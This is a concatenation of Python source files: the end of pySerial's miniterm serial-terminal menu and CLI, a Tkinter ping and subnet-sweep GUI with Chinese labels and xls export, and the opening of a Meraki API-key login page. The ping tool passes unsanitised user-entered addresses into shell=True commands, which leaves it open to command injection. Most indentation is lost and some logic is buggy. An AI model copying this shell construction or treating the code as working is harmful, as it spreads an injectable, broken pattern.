elif c == self.menu_character:
menu_active = True # next char will be for menu
elif c == self.exit_character:
self.stop() # exit app
break
else:
#~ if self.raw:
text = c
for transformation in self.tx_transformations:
text = transformation.tx(text)
self.serial.write(self.tx_encoder.encode(text))
if self.echo:
echo_text = c
for transformation in self.tx_transformations:
echo_text = transformation.echo(echo_text)
self.console.write(echo_text)
except:
self.alive = False
raise
def handle_menu_key(self, c):
"""Implement a simple menu / settings"""
if c == self.menu_character or c == self.exit_character:
# Menu/exit character again -> send itself
self.serial.write(self.tx_encoder.encode(c))
if self.echo:
self.console.write(c)
elif c == '\x15': # CTRL+U -> upload file
self.upload_file()
elif c in '\x08hH?': # CTRL+H, h, H, ? -> Show help
sys.stderr.write(self.get_help_text())
elif c == '\x12': # CTRL+R -> Toggle RTS
self.serial.rts = not self.serial.rts
sys.stderr.write('--- RTS {} ---\n'.format('active' if self.serial.rts else 'inactive'))
elif c == '\x04': # CTRL+D -> Toggle DTR
self.serial.dtr = not self.serial.dtr
sys.stderr.write('--- DTR {} ---\n'.format('active' if self.serial.dtr else 'inactive'))
elif c == '\x02': # CTRL+B -> toggle BREAK condition
self.serial.break_condition = not self.serial.break_condition
sys.stderr.write('--- BREAK {} ---\n'.format('active' if self.serial.break_condition else 'inactive'))
elif c == '\x05': # CTRL+E -> toggle local echo
self.echo = not self.echo
sys.stderr.write('--- local echo {} ---\n'.format('active' if self.echo else 'inactive'))
elif c == '\x06': # CTRL+F -> edit filters
self.change_filter()
elif c == '\x0c': # CTRL+L -> EOL mode
modes = list(EOL_TRANSFORMATIONS) # keys
eol = modes.index(self.eol) + 1
if eol >= len(modes):
eol = 0
self.eol = modes[eol]
sys.stderr.write('--- EOL: {} ---\n'.format(self.eol.upper()))
self.update_transformations()
elif c == '\x01': # CTRL+A -> set encoding
self.change_encoding()
elif c == '\x09': # CTRL+I -> info
self.dump_port_settings()
#~ elif c == '\x01': # CTRL+A -> cycle escape mode
#~ elif c == '\x0c': # CTRL+L -> cycle linefeed mode
elif c in 'pP': # P -> change port
self.change_port()
elif c in 'sS': # S -> suspend / open port temporarily
self.suspend_port()
elif c in 'bB': # B -> change baudrate
self.change_baudrate()
elif c == '8': # 8 -> change to 8 bits
self.serial.bytesize = serial.EIGHTBITS
self.dump_port_settings()
        elif c == '7':                          # 7 -> change to 7 bits
self.serial.bytesize = serial.SEVENBITS
self.dump_port_settings()
elif c in 'eE': # E -> change to even parity
self.serial.parity = serial.PARITY_EVEN
self.dump_port_settings()
elif c in 'oO': # O -> change to odd parity
self.serial.parity = serial.PARITY_ODD
self.dump_port_settings()
elif c in 'mM': # M -> change to mark parity
self.serial.parity = serial.PARITY_MARK
self.dump_port_settings()
elif c in 'sS': # S -> change to space parity
self.serial.parity = serial.PARITY_SPACE
self.dump_port_settings()
elif c in 'nN': # N -> change to no parity
self.serial.parity = serial.PARITY_NONE
self.dump_port_settings()
elif c == '1': # 1 -> change to 1 stop bits
self.serial.stopbits = serial.STOPBITS_ONE
self.dump_port_settings()
elif c == '2': # 2 -> change to 2 stop bits
self.serial.stopbits = serial.STOPBITS_TWO
self.dump_port_settings()
elif c == '3': # 3 -> change to 1.5 stop bits
self.serial.stopbits = serial.STOPBITS_ONE_POINT_FIVE
self.dump_port_settings()
elif c in 'xX': # X -> change software flow control
self.serial.xonxoff = (c == 'X')
self.dump_port_settings()
elif c in 'rR': # R -> change hardware flow control
self.serial.rtscts = (c == 'R')
self.dump_port_settings()
else:
sys.stderr.write('--- unknown menu character {} --\n'.format(key_description(c)))
    def cal_csum(self, data):
        """Return a simple one-byte additive checksum over the given data."""
        csum = 0
        for b in data:
            csum = (csum + (b if isinstance(b, int) else ord(b))) & 0xFF
        return csum
def upload_file(self):
"""Ask user for filenname and send its contents"""
sys.stderr.write('\n--- File to upload: ')
sys.stderr.flush()
with self.console:
filename = sys.stdin.readline().rstrip('\r\n')
if filename:
try:
self._stop_reader()
trans = FileTrans(self.serial, filename)
sys.stderr.write('--- Sending file {} ---\n'.format(filename))
trans.loop()
sys.stderr.write('\n--- File {} sent ---\n'.format(filename))
self._start_reader()
except IOError as e:
sys.stderr.write('--- ERROR opening file {}: {} ---\n'.format(filename, e))
def change_filter(self):
"""change the i/o transformations"""
sys.stderr.write('\n--- Available Filters:\n')
sys.stderr.write('\n'.join(
'--- {:<10} = {.__doc__}'.format(k, v)
for k, v in sorted(TRANSFORMATIONS.items())))
sys.stderr.write('\n--- Enter new filter name(s) [{}]: '.format(' '.join(self.filters)))
with self.console:
new_filters = sys.stdin.readline().lower().split()
if new_filters:
for f in new_filters:
if f not in TRANSFORMATIONS:
sys.stderr.write('--- unknown filter: {}\n'.format(repr(f)))
break
else:
self.filters = new_filters
self.update_transformations()
sys.stderr.write('--- filters: {}\n'.format(' '.join(self.filters)))
def change_encoding(self):
"""change encoding on the serial port"""
sys.stderr.write('\n--- Enter new encoding name [{}]: '.format(self.input_encoding))
with self.console:
new_encoding = sys.stdin.readline().strip()
if new_encoding:
try:
codecs.lookup(new_encoding)
except LookupError:
sys.stderr.write('--- invalid encoding name: {}\n'.format(new_encoding))
else:
self.set_rx_encoding(new_encoding)
self.set_tx_encoding(new_encoding)
sys.stderr.write('--- serial input encoding: {}\n'.format(self.input_encoding))
sys.stderr.write('--- serial output encoding: {}\n'.format(self.output_encoding))
def change_baudrate(self):
"""change the baudrate"""
sys.stderr.write('\n--- Baudrate: ')
sys.stderr.flush()
with self.console:
backup = self.serial.baudrate
try:
self.serial.baudrate = int(sys.stdin.readline().strip())
except ValueError as e:
sys.stderr.write('--- ERROR setting baudrate: {} ---\n'.format(e))
self.serial.baudrate = backup
else:
self.dump_port_settings()
def change_port(self):
"""Have a conversation with the user to change the serial port"""
with self.console:
try:
port = ask_for_port()
except KeyboardInterrupt:
port = None
if port and port != self.serial.port:
# reader thread needs to be shut down
self._stop_reader()
# save settings
settings = self.serial.getSettingsDict()
try:
new_serial = serial.serial_for_url(port, do_not_open=True)
# restore settings and open
new_serial.applySettingsDict(settings)
new_serial.rts = self.serial.rts
new_serial.dtr = self.serial.dtr
new_serial.open()
new_serial.break_condition = self.serial.break_condition
except Exception as e:
sys.stderr.write('--- ERROR opening new port: {} ---\n'.format(e))
new_serial.close()
else:
self.serial.close()
self.serial = new_serial
sys.stderr.write('--- Port changed to: {} ---\n'.format(self.serial.port))
# and restart the reader thread
self._start_reader()
def suspend_port(self):
"""\
open port temporarily, allow reconnect, exit and port change to get
out of the loop
"""
# reader thread needs to be shut down
self._stop_reader()
self.serial.close()
sys.stderr.write('\n--- Port closed: {} ---\n'.format(self.serial.port))
do_change_port = False
while not self.serial.is_open:
sys.stderr.write('--- Quit: {exit} | p: port change | any other key to reconnect ---\n'.format(
exit=key_description(self.exit_character)))
k = self.console.getkey()
if k == self.exit_character:
self.stop() # exit app
break
elif k in 'pP':
do_change_port = True
break
try:
self.serial.open()
except Exception as e:
sys.stderr.write('--- ERROR opening port: {} ---\n'.format(e))
if do_change_port:
self.change_port()
else:
# and restart the reader thread
self._start_reader()
sys.stderr.write('--- Port opened: {} ---\n'.format(self.serial.port))
def get_help_text(self):
"""return the help text"""
# help text, starts with blank line!
return """
--- pySerial ({version}) - miniterm - help
---
--- {exit:8} Exit program
--- {menu:8} Menu escape key, followed by:
--- Menu keys:
--- {menu:7} Send the menu character itself to remote
--- {exit:7} Send the exit character itself to remote
--- {info:7} Show info
--- {upload:7} Upload file (prompt will be shown)
--- {repr:7} encoding
--- {filter:7} edit filters
--- Toggles:
--- {rts:7} RTS {dtr:7} DTR {brk:7} BREAK
--- {echo:7} echo {eol:7} EOL
---
--- Port settings ({menu} followed by the following):
--- p change port
--- 7 8 set data bits
--- N E O S M change parity (None, Even, Odd, Space, Mark)
--- 1 2 3 set stop bits (1, 2, 1.5)
--- b change baud rate
--- x X disable/enable software flow control
--- r R disable/enable hardware flow control
""".format(version=getattr(serial, 'VERSION', 'unknown version'),
exit=key_description(self.exit_character),
menu=key_description(self.menu_character),
rts=key_description('\x12'),
dtr=key_description('\x04'),
brk=key_description('\x02'),
echo=key_description('\x05'),
info=key_description('\x09'),
upload=key_description('\x15'),
repr=key_description('\x01'),
filter=key_description('\x06'),
eol=key_description('\x0c'))
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
# default args can be used to override when calling main() from another script
# e.g to create a miniterm-my-device.py
def main(default_port=None, default_baudrate=115200, default_rts=0, default_dtr=0):
"""Command line tool, entry point"""
import argparse
parser = argparse.ArgumentParser(
description="Miniterm - A simple terminal program for the serial port.")
parser.add_argument(
"port",
nargs='?',
help="serial port name ('-' to show port list)",
default=default_port)
parser.add_argument(
"baudrate",
nargs='?',
type=int,
help="set baud rate, default: %(default)s",
default=default_baudrate)
group = parser.add_argument_group("port settings")
group.add_argument(
"--parity",
choices=['N', 'E', 'O', 'S', 'M'],
type=lambda c: c.upper(),
help="set parity, one of {N E O S M}, default: N",
default='N')
group.add_argument(
"--rtscts",
action="store_true",
help="enable RTS/CTS flow control (default off)",
default=False)
group.add_argument(
"--xonxoff",
action="store_true",
help="enable software flow control (default off)",
default=False)
group.add_argument(
"--rts",
type=int,
help="set initial RTS line state (possible values: 0, 1)",
default=default_rts)
group.add_argument(
"--dtr",
type=int,
help="set initial DTR line state (possible values: 0, 1)",
default=default_dtr)
group.add_argument(
"--ask",
action="store_true",
help="ask again for port when open fails",
default=False)
group = parser.add_argument_group("data handling")
group.add_argument(
"-e", "--echo",
action="store_true",
help="enable local echo (default off)",
default=False)
group.add_argument(
"--encoding",
dest="serial_port_encoding",
metavar="CODEC",
help="set the encoding for the serial port (e.g. hexlify, Latin1, UTF-8), default: %(default)s",
default='UTF-8')
group.add_argument(
"-f", "--filter",
action="append",
metavar="NAME",
help="add text transformation",
default=[])
group.add_argument(
"--eol",
choices=['CR', 'LF', 'CRLF'],
type=lambda c: c.upper(),
help="end of line mode",
default='CRLF')
group.add_argument(
"--raw",
action="store_true",
help="Do no apply any encodings/transformations",
default=False)
group = parser.add_argument_group("hotkeys")
group.add_argument(
"--exit-char",
type=int,
metavar='NUM',
help="Unicode of special character that is used to exit the application, default: %(default)s",
default=0x1d) # GS/CTRL+]
group.add_argument(
"--menu-char",
type=int,
metavar='NUM',
help="Unicode code of special character that is used to control miniterm (menu), default: %(default)s",
default=0x14) # Menu: CTRL+T
group = parser.add_argument_group("diagnostics")
group.add_argument(
"-q", "--quiet",
action="store_true",
help="suppress non-error messages",
default=False)
group.add_argument(
"--develop",
action="store_true",
help="show Python traceback on error",
default=False)
args = parser.parse_args()
if args.menu_char == args.exit_char:
parser.error('--exit-char can not be the same as --menu-char')
if args.filter:
if 'help' in args.filter:
sys.stderr.write('Available filters:\n')
sys.stderr.write('\n'.join(
'{:<10} = {.__doc__}'.format(k, v)
for k, v in sorted(TRANSFORMATIONS.items())))
sys.stderr.write('\n')
sys.exit(1)
filters = args.filter
else:
filters = ['default']
while True:
# no port given on command line -> ask user now
if args.port is None or args.port == '-':
try:
args.port = ask_for_port()
except KeyboardInterrupt:
sys.stderr.write('\n')
parser.error('user aborted and port is not given')
else:
if not args.port:
parser.error('port is not given')
try:
serial_instance = serial.serial_for_url(
args.port,
args.baudrate,
parity=args.parity,
rtscts=args.rtscts,
xonxoff=args.xonxoff,
do_not_open=True)
if not hasattr(serial_instance, 'cancel_read'):
# enable timeout for alive flag polling if cancel_read is not available
serial_instance.timeout = 1
if args.dtr is not None:
if not args.quiet:
sys.stderr.write('--- forcing DTR {}\n'.format('active' if args.dtr else 'inactive'))
serial_instance.dtr = args.dtr
if args.rts is not None:
if not args.quiet:
sys.stderr.write('--- forcing RTS {}\n'.format('active' if args.rts else 'inactive'))
serial_instance.rts = args.rts
serial_instance.open()
except serial.SerialException as e:
sys.stderr.write('could not open port {}: {}\n'.format(repr(args.port), e))
if args.develop:
raise
if not args.ask:
sys.exit(1)
else:
args.port = '-'
else:
break
miniterm = Miniterm(
serial_instance,
echo=args.echo,
eol=args.eol.lower(),
filters=filters)
miniterm.exit_character = unichr(args.exit_char)
miniterm.menu_character = unichr(args.menu_char)
miniterm.raw = args.raw
miniterm.set_rx_encoding(args.serial_port_encoding)
miniterm.set_tx_encoding(args.serial_port_encoding)
if not args.quiet:
sys.stderr.write('--- Miniterm on {p.name} {p.baudrate},{p.bytesize},{p.parity},{p.stopbits} ---\n'.format(
p=miniterm.serial))
sys.stderr.write('--- Quit: {} | Menu: {} | Help: {} followed by {} ---\n'.format(
key_description(miniterm.exit_character),
key_description(miniterm.menu_character),
key_description(miniterm.menu_character),
key_description('\x08')))
miniterm.start()
try:
miniterm.join(True)
except KeyboardInterrupt:
pass
if not args.quiet:
sys.stderr.write("\n--- exit ---\n")
miniterm.join()
miniterm.close()
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
if __name__ == '__main__':
main()
|
TK_NetworkScanning.py
|
import datetime
import re
import platform
import subprocess
import threading
from tkinter import Listbox, Menu, StringVar, Tk, messagebox, ttk
from tkinter.filedialog import askopenfilename, asksaveasfilename
import xlwt
from PIL import Image, ImageTk
TITLE_FONT = ("Helvetica", 16, "bold")
FALSE = False
function = 'function'
# images
img_IPtest = Image.open('./Images/IPtest_img.png')
img_ALL_IPimg = Image.open('./Images/ALL_IP_img.png')
img_infile = Image.open('./Images/inFile_img.png')
img_outFile = Image.open('./Images/outFile_img.png')
img_go = Image.open('./Images/go_img.png')
img_one_IPtes = Image.open('./Images/one_IPtest_img.png')
# resize the images
IPtest_image = img_IPtest.resize((60, 60), Image.ANTIALIAS)
ALL_IPimg_image = img_ALL_IPimg.resize((60, 60), Image.ANTIALIAS)
one_IPtest_image = img_one_IPtes.resize((60, 60), Image.ANTIALIAS)
# import/export and go icons
infile_image = img_infile.resize((25, 25), Image.ANTIALIAS)
outFile_image = img_outFile.resize((25, 25), Image.ANTIALIAS)
go_image = img_go.resize((25, 25), Image.ANTIALIAS)
class Network_Test(Tk):
"""
MainApp
"""
def __init__(self, *args, **kwargs):
Tk.__init__(self, *args, **kwargs)
mainframe = ttk.Frame(self, padding=(3, 3, 12, 12),
borderwidth=2, relief='sunken')
        self.resizable(width=False, height=False)  # disable window resizing
# self.iconbitmap("./Images/app_ico.ico")
mainframe.grid(column=0, row=0, sticky="nwes")
self.columnconfigure(0, weight=1)
self.rowconfigure(0, weight=1)
self.hig = []
for i in range(0, 18):
hi = mainframe.rowconfigure(i, weight=1)
self.hig.append(hi)
self.big = []
for j in range(0, 25):
tc = mainframe.columnconfigure(j, weight=1)
self.big.append(tc)
# self.geometry("600x300")
self.frames = {}
for F in (StartPage, Network_scan, ALL_IPtest):
page_name = F.__name__
frame = F(parent=mainframe, mainframe=self)
self.frames[page_name] = frame
frame.grid(row=0, column=0, sticky="nsew")
self.show_frame("StartPage")
def show_frame(self, page_name):
frame = self.frames[page_name]
frame.tkraise()
class StartPage(ttk.Frame):
"""
初始界面
"""
def __init__(self, parent, mainframe):
ttk.Frame.__init__(self, parent)
self.mainframe = mainframe
self.mainframe.title("网络测试(NetworkTest)")
        # menu bar
self.mainframe.option_add('*tearOff', FALSE)
menubar = Menu(self.mainframe)
self.mainframe['menu'] = menubar
menu_tools = Menu(menubar)
menu_help = Menu(menubar)
menubar.add_cascade(menu=menu_tools, label='工具库(Tools)')
menubar.add_cascade(menu=menu_help, label='帮助(H)')
menu_tools.add_command(label='IP地址测试(IP Test)',
command=lambda: mainframe.show_frame("StartPage"))
menu_help.add_command(
label='关于(About)', command=lambda: self.About_view())
menu_tools.add_command(label='网段扫描(Network scanning)',
command=lambda: mainframe.show_frame("Network_scan"))
menu_tools.add_command(label='自定义扫描(Auto Test)',
command=lambda: mainframe.show_frame("ALL_IPtest"))
        # single-address test
self.one_IPtest_img = ImageTk.PhotoImage(one_IPtest_image)
self.IPtest = ttk.Label(self, text='IP地址测试',
image=self.one_IPtest_img, compound='left', font=TITLE_FONT, foreground='#1296db')
self.Ip_start = ttk.Label(self, text='输入地址:', compound='left')
self.one_iptest = StringVar()
self.one_Ip_Entry = ttk.Entry(self, textvariable=self.one_iptest)
self.one_scanning = ttk.Button(
self, text="测试", command=lambda: self.One_IPtest())
self.clear_views = ttk.Button(
self, text="清空", command=lambda: self.cleane_view())
self.Stop_test = ttk.Button(
self, text="停止", command=lambda: self.Stop_Popen())
self.choie_N = ttk.Label(self, text="选择测试次数:", compound='left')
self.view_title = ttk.Label(self, text="测试结果", compound='left')
# stop_popen
self.stop_IPtest = StringVar()
self.stop_IPtest.set('1')
        # number of ping attempts
self.count_IPtest = StringVar()
self.country_one = ttk.Combobox(self, textvariable=self.count_IPtest)
self.country_one.bind('<< ComboboxSelected >>', function)
self.country_one['values'] = ('2', '3', '4', '5', '∞')
self.count_IPtest.set('4')
        # result display
VERTICAL = "vertical"
self.Scanning_one = Listbox(self, height=20, width=100)
self.ScanViews_one = ttk.Scrollbar(
self, orient=VERTICAL, command=self.Scanning_one.yview)
self.Scanning_one['yscrollcommand'] = self.ScanViews_one.set
ttk.Sizegrip().grid(column=2, row=4, sticky="se")
        # layout
self.IPtest.grid(column=0, row=0, sticky="nwes", padx=5, pady=5)
self.Ip_start.grid(column=1, row=1, sticky="nwes", padx=5, pady=5)
self.one_Ip_Entry.grid(column=2, row=1, sticky="nwes", padx=5, pady=5)
self.choie_N.grid(column=3, row=1, sticky="nwes", padx=5, pady=5)
self.country_one.grid(column=4, row=1, sticky="nwes", padx=5, pady=5)
self.one_scanning.grid(column=5, row=1, sticky="nwes", padx=5, pady=5)
self.view_title.grid(column=1, row=2, sticky="nwes", padx=5, pady=5)
self.ScanViews_one.grid(column=21, row=3, sticky="ns")
self.Scanning_one.grid(
column=1, row=3, sticky="nwes", columnspan=10, padx=5, pady=5)
self.Stop_test.grid(column=1, row=11, sticky="nwes",
columnspan=1, rowspan=1, padx=5, pady=5)
self.clear_views.grid(column=10, row=11, sticky="nwes",
columnspan=1, rowspan=1, padx=5, pady=5)
    # start the ping test
def One_IPtest(self):
"""
获取IP,开始Ping测试,结果实时输出到窗口
"""
        one_ip = self.one_iptest.get()  # get the IP address
        count_testnum = self.count_IPtest.get()  # get the number of ping attempts
self.stop_IPtest.set('1')
        if platform.system() == 'Windows':
if count_testnum == '∞':
add_num = "ping -t -w 600 "
else:
add_num = "ping -n {0} -w 600 ".format(count_testnum)
cmd = add_num+"{0}".format(one_ip)
p = subprocess.Popen(cmd, stdout=subprocess.PIPE,
stderr=subprocess.STDOUT, shell=True)
while p.poll() is None:
control = self.stop_IPtest.get()
if control == '0':
cmd_close = "taskkill /t /f /pid {0}".format(p.pid)
subprocess.Popen(cmd_close, stdout=subprocess.PIPE,
stderr=subprocess.STDOUT, shell=True)
break
else:
line = p.stdout.readline().strip().decode('gbk')
if line:
time_out = str(datetime.datetime.now())
test_out = time_out+':'+line
self.Scanning_one.insert('end', test_out)
self.Scanning_one.update()
        elif platform.system() == 'Linux':
if count_testnum == '∞':
add_num = "ping "
else:
add_num = "ping -c {0} ".format(count_testnum)
cmd = add_num+"{0}".format(one_ip)
p = subprocess.Popen(cmd, stdout=subprocess.PIPE,
stderr=subprocess.STDOUT, shell=True)
while p.poll() is None:
control = self.stop_IPtest.get()
if control == '0':
cmd_close = "pkill -9 {0}".format(p.pid)
subprocess.Popen(cmd_close, stdout=subprocess.PIPE,
stderr=subprocess.STDOUT, shell=True)
break
else:
line = p.stdout.readline().strip()
if line:
time_out = str(datetime.datetime.now())
test_out = time_out+':'+line
self.Scanning_one.insert('end', test_out)
self.Scanning_one.update()
else:
messagebox.showinfo('不支持该操作系统')
def cleane_view(self):
self.Scanning_one.delete('0', 'end')
def Stop_Popen(self):
self.stop_IPtest.set('0')
def About_view(self):
messagebox.showinfo('网络测试', """ 版本: 0.2
日期: 2019-02-05 11:30
Python: 3.7.0
源码发布于: https://github.com/ErickQian/NetworkScanning
""")
class Network_scan(ttk.Frame):
"""
网段扫描工具
"""
def __init__(self, parent, mainframe):
ttk.Frame.__init__(self, parent)
self.mainframe = mainframe
self.IPtest_img = ImageTk.PhotoImage(IPtest_image)
self.IPtest = ttk.Label(self, text='地址段扫描',
image=self.IPtest_img, compound='left', font=TITLE_FONT, foreground='#1296db')
self.Ip_start = ttk.Label(self, text='开始地址:', compound='left')
self.Ip_end = ttk.Label(self, text='结束地址:', compound='left')
self.var = StringVar()
self.Ip_Entry_s = ttk.Entry(self)
self.Ip_Entry_e = ttk.Entry(self, textvariable=self.var)
self.get_end_IP = ttk.Button(
self, text="自动", command=lambda: self.set_end_ip())
self.Do_scanning = ttk.Button(
self, text="开始扫描", command=lambda: self.start_ping())
self.choie_num = ttk.Label(self, text="选择测试次数:", compound='left')
        # number of ping attempts
self.countryvar = StringVar()
self.country = ttk.Combobox(self, textvariable=self.countryvar)
self.country.bind('<< ComboboxSelected >>', function)
self.country['values'] = ('1', '2', '3', '4', '5')
self.countryvar.set('3')
        # per-address indicator labels
self.list_index = 0
self.label_list = []
for i in range(1, 17):
for j in range(9, 25):
self.label = ttk.Label(
self, text=self.list_index, background="#CBCBCB")
self.list_index += 1
self.label.grid(column=j, row=i, sticky="nwes", padx=5, pady=5)
self.label_list.append(self.label)
        # layout
self.IPtest.grid(column=0, row=0, sticky="nwes", padx=5, pady=5)
self.Ip_Entry_s.grid(column=0, row=2, sticky="nwes", padx=5, pady=5)
self.Ip_start.grid(column=0, row=1, sticky="nwes", padx=5, pady=5)
self.Ip_end.grid(column=0, row=3, sticky="nwes", padx=5, pady=5)
self.get_end_IP.grid(column=1, row=4, sticky="nwes", padx=5, pady=5)
self.Ip_Entry_e.grid(column=0, row=4, sticky="nwes", padx=5, pady=5)
self.choie_num.grid(column=0, row=5, sticky="nwes", padx=5, pady=5)
self.country.grid(column=0, row=6, sticky="nwes", padx=5, pady=5)
self.Do_scanning.grid(column=0, row=7, sticky="nwes", padx=5, pady=5)
def set_end_ip(self):
"""
填写起始地址后,默认填写结束地址为同网段最后一个地址
"""
startip = self.Ip_Entry_s.get()
pattern = r"((?:(?:25[0-5]|2[0-4]\d|((1\d{2})|([1-9]?\d)))\.){3}(?:25[0-5]|2[0-4]\d|((1\d{2})|([1-9]?\d)))$)"
        m = re.match(pattern, startip)  # check that the IP address is valid
if m:
startip = startip.split('.')
startip[3] = '255'
endip = '.'.join(startip)
endip = self.var.set(endip)
else:
messagebox.showinfo(message='IP地址错误!\n地址只能为一个网段的IP,请检查你的输入!')
def start_ping(self):
"""
启动多线程
"""
        # validate the end IP
endip = self.var.get()
pattern = r"((?:(?:25[0-5]|2[0-4]\d|((1\d{2})|([1-9]?\d)))\.){3}(?:25[0-5]|2[0-4]\d|((1\d{2})|([1-9]?\d)))$)"
        m = re.match(pattern, endip)  # check that the IP address is valid
if m:
end_ip_test = True
else:
end_ip_test = False
messagebox.showinfo(message='IP地址错误!\n 详细信息:\n结束地址错误,请检查你的输入!')
        # start the test
self.reset_ui()
startip = self.Ip_Entry_s.get().split('.')
endip = self.var.get().split('.')
tmp_ip = startip
if int(startip[3]) <= int(endip[3]) and end_ip_test:
pthread_list = []
for i in range(int(startip[3]), int(endip[3]) + 1):
tmp_ip[3] = str(i)
ip = '.'.join(tmp_ip)
pthread_list.append(threading.Thread(
target=self.get_ping_result, args=(ip,)))
for item in pthread_list:
item.setDaemon(True)
item.start()
elif end_ip_test and int(startip[3]) > int(endip[3]):
messagebox.showinfo(
message='IP地址错误!\n详细信息:\n结束地址需要大于开始地址,请检查你的输入!')
def get_ping_result(self, ip):
"""
        Ping the given IP to check whether it is in use.
"""
num = self.countryvar.get()
commands = "ping -n {0} -w 600".format(num)
cmd_str = commands+" {0}".format(ip)
        DETACHED_PROCESS = 0x00000008  # do not create a console window (Windows only)
        try:
            subprocess.run(cmd_str, creationflags=DETACHED_PROCESS,
                           check=True)  # Windows-only ping invocation
except subprocess.CalledProcessError as err:
self.set_ui(False, ip)
else:
self.set_ui(True, ip)
def reset_ui(self):
"""
        Reset every address cell to the neutral grey background.
"""
for item in self.label_list:
item['background'] = "#CBCBCB"
def set_ui(self, result, ip):
"""
        Colour the cell for this address according to the ping result.
        result: outcome of the ping thread
        ip: the corresponding IP address
"""
index = int(ip.split('.')[3])
if result:
self.label_list[index]['background'] = "#55AA7F" # 设置背景为绿色
else:
self.label_list[index]['background'] = "#FF8E77" # 设置背景为红色
class ALL_IPtest(ttk.Frame):
"""
    Scan an arbitrary list of IP addresses read from a file.
    Results are shown in the window and can optionally be exported to a spreadsheet.
"""
def __init__(self, parent, mainframe):
ttk.Frame.__init__(self, parent)
self.mainframe = mainframe
        # Load button/label images
self.ALLIP_img = ImageTk.PhotoImage(ALL_IPimg_image)
self.infile_img = ImageTk.PhotoImage(infile_image)
self.outFile_img = ImageTk.PhotoImage(outFile_image)
self.go_img = ImageTk.PhotoImage(go_image)
self.IPtest = ttk.Label(self, text='自定义扫描',
image=self.ALLIP_img, compound='left', font=TITLE_FONT, foreground='#1296db')
        self.Get_IPtxt = ttk.Button(
            self, text="导入IP文件", image=self.infile_img, compound='left', command=lambda: self.start_ping())
self.Go_Scanning = ttk.Button(
self, text="开始扫描", image=self.go_img, compound='left')
self.Out_ScanningTxt = ttk.Button(
self, text="导出结果", image=self.outFile_img, compound='left', command=lambda: self.save_view())
self.Clean_ScanningTxt = ttk.Button(
self, text="清空", command=lambda: self.cleane_view())
self.TestView = ttk.Label(
self, text='扫描结果:', font=TITLE_FONT, foreground='#1296db')
self.ping_test = []
        # Results display
VERTICAL = "vertical"
self.Scanning_L = Listbox(self, height=20, width=100)
self.ScanViews = ttk.Scrollbar(
self, orient=VERTICAL, command=self.Scanning_L.yview)
self.Scanning_L['yscrollcommand'] = self.ScanViews.set
ttk.Sizegrip().grid(column=2, row=4, sticky="se")
self.ScanViews.grid(column=21, row=3, sticky="ns")
self.Scanning_L.grid(column=1, row=3, sticky="nwes",
columnspan=20, padx=5, pady=5)
self.IPtest.grid(column=0, row=0, sticky="nwes", padx=5, pady=5)
self.Get_IPtxt.grid(column=1, row=1, sticky="nwes",
columnspan=1, rowspan=1, padx=5, pady=5)
self.Go_Scanning.grid(column=2, row=1, sticky="nwes",
columnspan=1, rowspan=1, padx=5, pady=5)
self.Out_ScanningTxt.grid(
column=20, row=20, sticky="nwes", columnspan=1, rowspan=1, padx=5, pady=5)
self.Clean_ScanningTxt.grid(
column=1, row=20, sticky="nwes", columnspan=1, rowspan=1, padx=5, pady=5)
self.TestView.grid(column=1, row=2, sticky="nwes", padx=5, pady=5)
    # Load the IP list
def check_file(self):
"""
        Prompt (via askopenfilename) for a text file containing IP addresses, one per line.
"""
self.open_filename = askopenfilename(
title='打开文件', filetypes=[('All Files', '*')])
with open(self.open_filename, 'r') as f:
self.startip = f.readlines()
return(self.startip)
    # Process the IPs
def start_ping(self):
"""
        Launch one ping thread per address read from the imported file.
"""
get_ALLip = self.check_file()
        pthread_list = []
        # reset the results table before the worker threads start appending to it
        self.ping_test = [['时间', 'IP地址', 'Ping次数', '通信情况']]
self.Scanning_L.insert(
'end', '时间 IP地址 测试次数 通信状态')
for line in get_ALLip:
if len(line.strip()):
ip = line.strip('\n')
                # queue a ping thread for this address
pthread_list.append(threading.Thread(
target=self.get_ping_result, args=(ip,)))
for item in pthread_list:
item.setDaemon(True)
item.start()
def get_ping_result(self, ip):
"""
        Ping the given IP to check whether it is reachable.
"""
cmd_str = "ping {0} -n 4 -w 600".format(ip)
        DETACHED_PROCESS = 0x00000008  # do not create a console window (Windows only)
        time_now = datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S')
        try:
            subprocess.run(cmd_str, creationflags=DETACHED_PROCESS,
                           check=True)  # Windows-only ping invocation
except subprocess.CalledProcessError as err:
self.Scanning_L.insert(
'end', '%s %s 4 通信失败' % (str(time_now), ip))
self.ping_test.append([time_now, ip, 4, '通信失败'])
else:
self.ping_test.append([time_now, ip, 4, '通信正常'])
self.Scanning_L.insert(
'end', '%s %s 4 通信正常' % (str(time_now), ip))
self.Scanning_L.update()
def cleane_view(self):
self.Scanning_L.delete('0', 'end')
def save_view(self):
        PingTest = xlwt.Workbook()  # create a new workbook
        sheet = PingTest.add_sheet('Ping测试数据结果')  # add a worksheet
        row = 0  # row index
        for stu in self.ping_test:
            col = 0  # column index
            for s in stu:  # write every value of this row into its own column
                sheet.write(row, col, s)
                col += 1
            row += 1
        PingTest.save('Ping测试数据结果.xls')  # saved to the current working directory
messagebox.showinfo('提示', '数据已导出到程序可执行文件目录下的(Ping测试数据结果.xls)文件中!')
if __name__ == "__main__":
app = Network_Test()
app.mainloop()
|
pages.py
|
import threading
import tkinter as tk
from tkinter import *
from tkinter import ttk
import ipaddress
import automation.automation_core
class StartPage(tk.Frame):
"""
    The application starts by asking you for your Meraki Dashboard API key, validates it, stores it on the
    AutomationCore instance, and then redirects you to the Organization Page.
"""
invalid_api_key = None
def __init__(self, parent, controller):
tk.Frame.__init__(self, parent)
# Setting background color
self.config(background='#3a995b')
# Setting my_tkinter_interface controller
self.controller = controller
# Project name
self.label_title = tk.Label(self, text='Welcome to Meraki-automation-dns', font=('Roboto', 32), bg='#3a995b',
fg='white')
self.label_title.pack()
# Asking for Dashboard API key
self.label_instruction = tk.Label(self, text='Please enter your Meraki Dashboard API key to start :',
font=('Roboto', 16),
bg='#3a995b', fg='white')
self.label_instruction.pack()
# Api key input
api_key_input = Entry(self, font=("Helvetica", 12), text='')
api_key_input.pack()
# validate api key button
validate_api_key_button = Button(self, text="Validate", font=("Helvetica", 12), bg='white', fg='#3a995b',
command=lambda: self.validate_api_key(api_key=api_key_input.get(),
controller=controller))
validate_api_key_button.pack(pady=10)
# Error message if the API Key is invalid
self.invalid_api_key = tk.Label(self, text='Your Meraki Dashboard API key is invalid, please retry',
